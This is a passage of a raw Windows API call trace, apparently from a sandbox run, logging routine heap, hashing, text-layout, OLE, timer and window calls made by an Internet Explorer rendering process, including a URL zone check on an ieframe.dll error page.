| out: hHeap=0x5e0000) returned 1 [0161.562] LsdnFinishRegular () returned 0x0 [0161.562] LsQueryLineDup () returned 0x0 [0161.562] IOleInPlaceFrame:SetMenu (This=0xd90480, hmenuShared=0x814c, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0161.562] LsQueryLineCpPpoint () returned 0x0 [0161.562] LsDestroyLine () returned 0x0 [0161.562] IOleInPlaceSite:CanInPlaceActivate (This=0xcfb560) returned 0x0 [0161.562] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.563] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9000 [0161.563] HashData (in: pbData=0x6d9000, cbData=0x1, pbHash=0x196818, cbHash=0x2 | out: pbHash=0x196818) returned 0x0 [0161.563] HashData (in: pbData=0x196814, cbData=0x4, pbHash=0x196820, cbHash=0x2 | out: pbHash=0x196820) returned 0x0 [0161.563] HashData (in: pbData=0x6d9004, cbData=0xc, pbHash=0x19681c, cbHash=0x2 | out: pbHash=0x19681c) returned 0x0 [0161.563] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9000 | out: hHeap=0x5e0000) returned 1 [0161.563] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9138 [0161.563] HashData (in: pbData=0x6d9138, cbData=0x1, pbHash=0x196818, cbHash=0x2 | out: pbHash=0x196818) returned 0x0 [0161.563] HashData (in: pbData=0x196814, cbData=0x4, pbHash=0x196820, cbHash=0x2 | out: pbHash=0x196820) returned 0x0 [0161.563] HashData (in: pbData=0x6d913c, cbData=0xc, pbHash=0x19681c, cbHash=0x2 | out: pbHash=0x19681c) returned 0x0 [0161.563] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9138 | out: hHeap=0x5e0000) returned 1 [0161.563] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9000 [0161.563] HashData (in: pbData=0x6d9000, cbData=0x1, pbHash=0x196818, cbHash=0x2 | out: pbHash=0x196818) returned 0x0 [0161.563] HashData (in: pbData=0x196814, cbData=0x4, pbHash=0x196820, cbHash=0x2 | out: pbHash=0x196820) returned 0x0 [0161.563] HashData (in: pbData=0x6d9004, cbData=0xc, pbHash=0x19681c, cbHash=0x2 | out: pbHash=0x19681c) returned 0x0 [0161.563] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9000 | out: hHeap=0x5e0000) returned 1 [0161.563] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9168 [0161.564] HashData (in: pbData=0x6d9168, cbData=0x1, pbHash=0x196818, cbHash=0x2 | out: pbHash=0x196818) returned 0x0 [0161.564] HashData (in: pbData=0x196814, cbData=0x4, pbHash=0x196820, cbHash=0x2 | out: pbHash=0x196820) returned 0x0 [0161.564] HashData (in: pbData=0x6d916c, cbData=0xc, pbHash=0x19681c, cbHash=0x2 | out: pbHash=0x19681c) returned 0x0 [0161.564] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9168 | out: hHeap=0x5e0000) returned 1 [0161.564] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.564] LsSetDoc () returned 0x0 [0161.564] LsCreateLine () returned 0x0 [0161.564] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.565] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9000 [0161.565] HashData (in: pbData=0x6d9000, cbData=0x1, pbHash=0x1957a8, cbHash=0x2 | out: pbHash=0x1957a8) returned 0x0 [0161.565] HashData (in: pbData=0x1957a4, cbData=0x4, pbHash=0x1957b0, cbHash=0x2 | out: pbHash=0x1957b0) returned 0x0 [0161.565] HashData (in: pbData=0x6d9004, cbData=0xc, pbHash=0x1957ac, cbHash=0x2 | out: pbHash=0x1957ac) returned 0x0 [0161.565] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9000 | out: hHeap=0x5e0000) returned 1 [0161.565] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9138 [0161.565] HashData (in: pbData=0x6d9138, cbData=0x1, pbHash=0x1957a8, cbHash=0x2 | out: pbHash=0x1957a8) returned 0x0 [0161.565] HashData (in: pbData=0x1957a4, cbData=0x4, pbHash=0x1957b0, cbHash=0x2 | out: pbHash=0x1957b0) returned 0x0 [0161.565] HashData (in: pbData=0x6d913c, cbData=0xc, pbHash=0x1957ac, cbHash=0x2 | out: pbHash=0x1957ac) returned 0x0 [0161.565] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9138 | out: hHeap=0x5e0000) returned 1 [0161.565] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.567] LsSetDoc () returned 0x0 [0161.567] LsCreateLine () returned 0x0 [0161.567] LsQueryLineDup () returned 0x0 [0161.567] LsDestroyLine () returned 0x0 [0161.567] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.567] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.568] LsdnFinishRegular () returned 0x0 [0161.569] LsQueryLineDup () returned 0x0 [0161.569] IOleInPlaceFrame:SetMenu (This=0xd904a0, hmenuShared=0x74cc, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0161.569] LsQueryLineCpPpoint () returned 0x0 [0161.569] LsDestroyLine () returned 0x0 [0161.569] IOleInPlaceSite:CanInPlaceActivate (This=0xcfb560) returned 0x0 [0161.569] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.569] LsdnFinishRegular () returned 0x0 [0161.569] LsQueryLineDup () returned 0x0 [0161.570] IOleInPlaceFrame:SetMenu (This=0xd90420, hmenuShared=0x94d4, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0161.570] LsQueryLineCpPpoint () returned 0x0 [0161.570] LsDestroyLine () returned 0x0 [0161.570] IOleInPlaceSite:CanInPlaceActivate (This=0xcfa380) returned 0x0 [0161.570] LsDestroyContext () returned 0x0 [0161.570] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6cb5b8 | out: hHeap=0x5e0000) returned 1 [0161.570] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d82a8 | out: hHeap=0x5e0000) returned 1 [0161.570] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef1ca0 | out: hHeap=0x5e0000) returned 1 [0161.570] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d81e8 | out: hHeap=0x5e0000) returned 1 [0161.570] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9890 | out: hHeap=0x5e0000) returned 1 [0161.571] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9e80 | out: hHeap=0x5e0000) returned 1 [0161.571] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d2a70 | out: hHeap=0x5e0000) returned 1 [0161.571] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6db628 | out: hHeap=0x5e0000) returned 1 [0161.571] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9ef8 | out: hHeap=0x5e0000) returned 1 [0161.571] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9d18 | out: hHeap=0x5e0000) returned 1 [0161.571] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9cc8 | out: hHeap=0x5e0000) returned 1 [0161.571] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9ea8 | out: hHeap=0x5e0000) returned 1 [0161.571] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef1f90 | out: hHeap=0x5e0000) returned 1 [0161.571] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6de988 | out: hHeap=0x5e0000) returned 1 [0161.572] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x67aa80 | out: hHeap=0x5e0000) returned 1 [0161.572] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9efab20 | out: hHeap=0x5e0000) returned 1 [0161.572] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6deab8 | out: hHeap=0x5e0000) returned 1 [0161.572] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef2398 | out: hHeap=0x5e0000) returned 1 [0161.572] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x64b990 | out: hHeap=0x5e0000) returned 1 [0161.572] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef2730 | out: hHeap=0x5e0000) returned 1 [0161.572] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6ce408 | out: hHeap=0x5e0000) returned 1 [0161.572] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcae0 | out: hHeap=0x5e0000) returned 1 [0161.572] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f7e90 | out: hHeap=0x5e0000) returned 1 [0161.572] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8fe8 | out: hHeap=0x5e0000) returned 1 [0161.572] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef2c00 | out: hHeap=0x5e0000) returned 1 [0161.572] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef28c8 | out: hHeap=0x5e0000) returned 1 [0161.572] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x64b0a0 | out: hHeap=0x5e0000) returned 1 [0161.573] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef2a68 | out: hHeap=0x5e0000) returned 1 [0161.573] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x68d3e8 | out: hHeap=0x5e0000) returned 1 [0161.573] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6cfbe0 | out: hHeap=0x5e0000) returned 1 [0161.573] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef24b0 | out: hHeap=0x5e0000) returned 1 [0161.573] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef9e00 | out: hHeap=0x5e0000) returned 1 [0161.573] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef1628 | out: hHeap=0x5e0000) returned 1 [0161.573] LsDestroyContext () returned 0x0 [0161.573] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d0018 | out: hHeap=0x5e0000) returned 1 [0161.574] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7f18 | out: hHeap=0x5e0000) returned 1 [0161.574] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6bcb70 | out: hHeap=0x5e0000) returned 1 [0161.574] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7f48 | out: hHeap=0x5e0000) returned 1 [0161.574] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9908 | out: hHeap=0x5e0000) returned 1 [0161.574] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d99f8 | out: hHeap=0x5e0000) returned 1 [0161.574] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d2920 | out: hHeap=0x5e0000) returned 1 [0161.574] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6db748 | out: hHeap=0x5e0000) returned 1 [0161.576] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9818 | out: hHeap=0x5e0000) returned 1 [0161.576] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d97f0 | out: hHeap=0x5e0000) returned 1 [0161.576] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9840 | out: hHeap=0x5e0000) returned 1 [0161.576] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d98b8 | out: hHeap=0x5e0000) returned 1 [0161.576] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dd2b8 | out: hHeap=0x5e0000) returned 1 [0161.577] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6bce60 | out: hHeap=0x5e0000) returned 1 [0161.577] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x67c890 | out: hHeap=0x5e0000) returned 1 [0161.577] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6bdbc0 | out: hHeap=0x5e0000) returned 1 [0161.577] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6da5c8 | out: hHeap=0x5e0000) returned 1 [0161.577] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6cb4a0 | out: hHeap=0x5e0000) returned 1 [0161.577] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x64ae30 | out: hHeap=0x5e0000) returned 1 [0161.577] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6de238 | out: hHeap=0x5e0000) returned 1 [0161.577] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6cdc08 | out: hHeap=0x5e0000) returned 1 [0161.577] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcb20 | out: hHeap=0x5e0000) returned 1 [0161.577] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f8320 | out: hHeap=0x5e0000) returned 1 [0161.578] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8fd0 | out: hHeap=0x5e0000) returned 1 [0161.578] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6de708 | out: hHeap=0x5e0000) returned 1 [0161.578] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6de3d0 | out: hHeap=0x5e0000) returned 1 [0161.578] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x64b8c0 | out: hHeap=0x5e0000) returned 1 [0161.578] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6de570 | out: hHeap=0x5e0000) returned 1 [0161.578] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x68d5a0 | out: hHeap=0x5e0000) returned 1 [0161.578] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6bc3d0 | out: hHeap=0x5e0000) returned 1 [0161.578] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6ddfb8 | out: hHeap=0x5e0000) returned 1 [0161.578] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6bdcd8 | out: hHeap=0x5e0000) returned 1 [0161.578] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9f50 | out: hHeap=0x5e0000) returned 1 [0161.579] QueryPerformanceCounter (in: lpPerformanceCount=0xd11de0 | out: lpPerformanceCount=0xd11de0*=3098039786166) returned 1 [0161.579] GetCurrentThreadId () returned 0xb48 [0161.579] GetCurrentThreadId () returned 0xb48 [0161.579] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.579] GetCurrentThreadId () returned 0xb48 [0161.579] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9168 [0161.579] HashData (in: pbData=0x6d9168, cbData=0x1, pbHash=0x198a00, cbHash=0x2 | out: pbHash=0x198a00) returned 0x0 [0161.579] HashData (in: pbData=0x1989fc, cbData=0x4, pbHash=0x198a08, cbHash=0x2 | out: pbHash=0x198a08) returned 0x0 [0161.579] HashData (in: pbData=0x6d916c, cbData=0xc, pbHash=0x198a04, cbHash=0x2 | out: pbHash=0x198a04) returned 0x0 [0161.579] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9168 | out: hHeap=0x5e0000) returned 1 [0161.579] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9138 [0161.579] HashData (in: pbData=0x6d9138, cbData=0x1, pbHash=0x198a00, cbHash=0x2 | out: pbHash=0x198a00) returned 0x0 [0161.579] HashData (in: pbData=0x1989fc, cbData=0x4, pbHash=0x198a08, cbHash=0x2 | out: pbHash=0x198a08) returned 0x0 [0161.580] HashData (in: pbData=0x6d913c, cbData=0xc, pbHash=0x198a04, cbHash=0x2 | out: pbHash=0x198a04) returned 0x0 [0161.580] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9138 | out: hHeap=0x5e0000) returned 1 [0161.580] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9138 [0161.580] HashData (in: pbData=0x6d9138, cbData=0x1, pbHash=0x198a00, cbHash=0x2 | out: pbHash=0x198a00) returned 0x0 [0161.580] HashData (in: pbData=0x1989fc, cbData=0x4, pbHash=0x198a08, cbHash=0x2 | out: pbHash=0x198a08) returned 0x0 [0161.580] HashData (in: pbData=0x6d913c, cbData=0xc, pbHash=0x198a04, cbHash=0x2 | out: pbHash=0x198a04) returned 0x0 [0161.580] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9138 | out: hHeap=0x5e0000) returned 1 [0161.580] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d91f8 [0161.580] HashData (in: pbData=0x6d91f8, cbData=0x1, pbHash=0x198a00, cbHash=0x2 | out: pbHash=0x198a00) returned 0x0 [0161.580] HashData (in: pbData=0x1989fc, cbData=0x4, pbHash=0x198a08, cbHash=0x2 | out: pbHash=0x198a08) returned 0x0 [0161.580] HashData (in: pbData=0x6d91fc, cbData=0xc, pbHash=0x198a04, cbHash=0x2 | out: pbHash=0x198a04) returned 0x0 [0161.580] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d91f8 | out: hHeap=0x5e0000) returned 1 [0161.580] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d8fd0 [0161.580] HashData (in: pbData=0x6d8fd0, cbData=0x1, pbHash=0x198a00, cbHash=0x2 | out: pbHash=0x198a00) returned 0x0 [0161.580] HashData (in: pbData=0x1989fc, cbData=0x4, pbHash=0x198a08, cbHash=0x2 | out: pbHash=0x198a08) returned 0x0 [0161.580] HashData (in: pbData=0x6d8fd4, cbData=0xc, pbHash=0x198a04, cbHash=0x2 | out: pbHash=0x198a04) returned 0x0 [0161.580] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8fd0 | out: hHeap=0x5e0000) returned 1 [0161.580] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9168 [0161.581] HashData (in: pbData=0x6d9168, cbData=0x1, pbHash=0x198a00, cbHash=0x2 | out: pbHash=0x198a00) returned 0x0 [0161.581] HashData (in: pbData=0x1989fc, cbData=0x4, pbHash=0x198a08, cbHash=0x2 | out: pbHash=0x198a08) returned 0x0 [0161.581] HashData (in: pbData=0x6d916c, cbData=0xc, pbHash=0x198a04, cbHash=0x2 | out: pbHash=0x198a04) returned 0x0 [0161.581] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9168 | out: hHeap=0x5e0000) returned 1 [0161.581] QueryPerformanceCounter (in: lpPerformanceCount=0xd11de0 | out: lpPerformanceCount=0xd11de0*=3098039994551) returned 1 [0161.581] GetCurrentThreadId () returned 0xb48 [0161.581] GetCurrentThreadId () returned 0xb48 [0161.581] GetCurrentThreadId () returned 0xb48 [0161.581] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.581] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x7c) returned 0x68caf8 [0161.581] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x68caf8 | out: hHeap=0x5e0000) returned 1 [0161.581] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.582] LsSetDoc () returned 0x0 [0161.582] LsCreateLine () returned 0x0 [0161.582] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.582] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.582] LsdnFinishRegular () returned 0x0 [0161.582] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.582] LsdnFinishRegular () returned 0x0 [0161.583] LsQueryLineCpPpoint () returned 0x0 [0161.583] IOleInPlaceFrame:SetMenu (This=0xd90500, hmenuShared=0x1004, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0161.583] IOleInPlaceFrame:SetMenu (This=0xd904e0, hmenuShared=0x1004, holemenu=0x0, hwndActiveObject=0x0) returned 0x0 [0161.583] LsQueryLineCpPpoint () returned 0x0 [0161.583] LsDestroyLine () returned 0x0 [0161.583] IOleInPlaceSite:CanInPlaceActivate (This=0xcfa380) returned 0x0 [0161.583] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.583] IsRectEmpty (lprc=0x198c28) returned 1 [0161.583] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x110) returned 0x6d0018 [0161.584] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d91f8 [0161.584] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d8fd0 [0161.584] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d8fe8 [0161.584] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9000 [0161.584] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9138 [0161.584] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x58) returned 0x6ddbf8 [0161.584] GetFocus () returned 0x103e2 [0161.584] GetCurrentThreadId () returned 0xb48 [0161.584] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x66e993a2, dwHighDateTime=0x1d7d80b)) [0161.585] GetTickCount () returned 0x1d730e6 [0161.585] GetTickCount () returned 0x1d730e6 [0161.585] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x66e993a2, dwHighDateTime=0x1d7d80b)) [0161.610] GetTickCount () returned 0x1d730f5 [0161.610] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x66ed6f0a, dwHighDateTime=0x1d7d80b)) [0161.610] free (_Block=0xc5d398) [0161.611] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199c48 | out: lpPoint=0x199c48) returned 1 [0161.611] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.611] GetCurrentThreadId () returned 0xb48 [0161.612] GetCurrentThreadId () returned 0xb48 [0161.612] QueryPerformanceCounter (in: lpPerformanceCount=0x199de0 | out: lpPerformanceCount=0x199de0*=3098043078772) returned 1 [0161.612] GetCurrentThreadId () returned 0xb48 [0161.612] GetCurrentThreadId () returned 0xb48 [0161.612] IsWinEventHookInstalled (event=0x8000) returned 1 [0161.612] NotifyWinEvent (event=0x8000, hwnd=0x103e2, idObject=0, idChild=0) [0161.613] StrCmpICW (pszStr1="about:blank", pszStr2="res://ieframe.dll/error.dlg") returned -17 [0161.613] StrCmpICW (pszStr1="about:blank", pszStr2="res://ieframe.dll/error.dlg") returned -17 [0161.613] IUnknown:AddRef (This=0x68e1fc) returned 0x9 [0161.613] IUnknown:AddRef (This=0x6cdf88) returned 0x2 [0161.613] IInternetSecurityManager:MapUrlToZone (in: This=0xd1e334, pwszUrl="res://ieframe.dll/error.dlg", pdwZone=0x199e44, dwFlags=0x0 | out: pdwZone=0x199e44*=0xffffffff) returned 0x800c0011 [0161.613] IUnknown:Release (This=0x6cdf88) returned 0x1 [0161.613] IUnknown:Release (This=0x68e1fc) returned 0x8 [0161.613] GetCurrentThreadId () returned 0xb48 [0161.614] QueryPerformanceCounter (in: lpPerformanceCount=0x19a2c0 | out: lpPerformanceCount=0x19a2c0*=3098043280129) returned 1 [0161.614] QueryPerformanceCounter (in: lpPerformanceCount=0x19a210 | out: lpPerformanceCount=0x19a210*=3098043323410) returned 1 [0161.615] SetEvent (hEvent=0x304) returned 1 [0161.617] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a200 | out: lpPoint=0x19a200) returned 1 [0161.617] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.617] GetCurrentThreadId () returned 0xb48 [0161.618] GetCurrentThreadId () returned 0xb48 [0161.618] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a1a8 | out: lpPoint=0x19a1a8) returned 1 [0161.618] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.619] GetCurrentThreadId () returned 0xb48 [0161.619] GetCurrentThreadId () returned 0xb48 [0161.619] GetFocus () returned 0x103e2 [0161.619] GetCurrentThreadId () returned 0xb48 [0161.619] GetCurrentThreadId () returned 0xb48 [0161.620] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a1a8 | out: lpPoint=0x19a1a8) returned 1 [0161.620] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.620] GetCurrentThreadId () returned 0xb48 [0161.620] GetCurrentThreadId () returned 0xb48 [0161.620] GetFocus () returned 0x103e2 [0161.620] GetCurrentThreadId () returned 0xb48 [0161.620] IsWinEventHookInstalled (event=0x8005) returned 0 [0161.621] GetCurrentThreadId () returned 0xb48 [0161.621] GetCurrentThreadId () returned 0xb48 [0161.625] LsSetDoc () returned 0x0 [0161.625] LsCreateLine () returned 0x0 [0161.625] LsDestroyLine () returned 0x0 [0161.625] GetFocus () returned 0x103e2 [0161.625] SystemParametersInfoW (in: uiAction=0x2006, uiParam=0x0, pvParam=0x19a268, fWinIni=0x0 | out: pvParam=0x19a268) returned 1 [0161.626] _CIsqrt () returned 0x3ff0027f [0161.626] _CIsqrt () returned 0x3ff0027f [0161.627] _CIatan2 () returned 0x20 [0161.629] SetCaretPos (X=182, Y=227) returned 1 [0161.629] QueryPerformanceCounter (in: lpPerformanceCount=0xd11de0 | out: lpPerformanceCount=0xd11de0*=3098044816261) returned 1 [0161.629] GetCurrentThreadId () returned 0xb48 [0161.629] GetCurrentThreadId () returned 0xb48 [0161.629] GetCurrentThreadId () returned 0xb48 [0161.630] QueryPerformanceCounter (in: lpPerformanceCount=0x19a304 | out: lpPerformanceCount=0x19a304*=3098044873048) returned 1 [0161.630] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0161.630] GetFocus () returned 0x103e2 [0161.630] EnumChildWindows (hWndParent=0x103ba, lpEnumFunc=0x6e0775e0, lParam=0x19a20f) returned 0 [0161.630] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.630] GetClientRect (in: hWnd=0x103ba, lpRect=0xcfc7b4 | out: lpRect=0xcfc7b4) returned 1 [0161.630] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.630] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.631] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.631] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.631] QueryPerformanceCounter (in: lpPerformanceCount=0x199dc8 | out: lpPerformanceCount=0x199dc8*=3098045000767) returned 1 [0161.631] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.632] QueryPerformanceCounter (in: lpPerformanceCount=0x199dc8 | out: lpPerformanceCount=0x199dc8*=3098045064423) returned 1 [0161.632] GetCurrentThreadId () returned 0xb48 [0161.633] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0161.633] QueryPerformanceCounter (in: lpPerformanceCount=0x19a2e0 | out: lpPerformanceCount=0x19a2e0*=3098045168586) returned 1 [0161.633] QueryPerformanceCounter (in: lpPerformanceCount=0x19a2f0 | out: lpPerformanceCount=0x19a2f0*=3098045174977) returned 1 [0161.633] KillTimer (hWnd=0x30316, uIDEvent=0x2003) returned 1 [0161.633] GetMessageW (lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) [0161.634] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0161.634] SetEvent (hEvent=0x310) returned 1 [0161.634] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103bc, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0161.634] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103bc, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0161.634] PeekMessageW (in: lpMsg=0x19a3fc, 